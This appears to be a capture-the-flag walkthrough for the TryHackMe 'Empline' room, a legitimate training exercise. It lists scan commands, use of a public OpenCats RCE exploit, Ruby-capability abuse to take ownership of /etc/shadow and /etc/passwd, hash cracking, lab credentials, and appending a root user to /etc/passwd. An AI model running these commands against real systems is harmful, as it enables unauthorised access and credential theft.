Empline

Room Link: https://tryhackme.com/room/empline

Scans

Initial scan

Kali

nmap -A $VICTIM

Longer scan

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir --url http://$VICTIM/ -w /usr/share/dirb/wordlists/big.txt -l

Kali

echo "$VICTIM job.empline.thm" >> /etc/hosts

Initial Shell

OpenCats 0.9.4 has a RCE exploit.

Exploit: https://www.exploit-db.com/raw/50585

Kali

chmod +x exploit.sh 
./exploit.sh 
./exploit.sh http://job.empline.thm/

Victim

getcap -r / 2>/dev/null

Victim

ls -lah /etc/shadow
ruby -e 'require "fileutils"; FileUtils.chown("www-data", "www-data", "/etc/shadow")'
ls -lah /etc/shadow

Victim

Now that we can read both f these files we can transfer them to Kali. I let this run for a while but it wasn't cracking any hashes.

cat /etc/passwd
cat /etc/shadow

Kali

unshadow passwd shadow > passwords.txt

Kali

john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt

I went back to the check the box and found the database credentials

Victim

find / -name "config.php"
cat /var/www/opencats/config.php 

Kali

mysql -h $VICTIM -u james -png6pUFvsGNtw  

Kali(mysql)

show databases;
use opencats
show tables;  
select * from user;  

There were a few hashes from users so I put them in crackstation and one returned a result.

TCP/22 - SSH

Kali

ssh george@$VICTIM
Password: pretonnevippasempre

Privilege Escalation

Since I had access to change any file already I just added a new root user to passwd

Victim

ruby -e 'require "fileutils"; FileUtils.chown("george", "george", "/etc/passwd")'
echo 'new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash' >> /etc/passwd
su new
Password: 123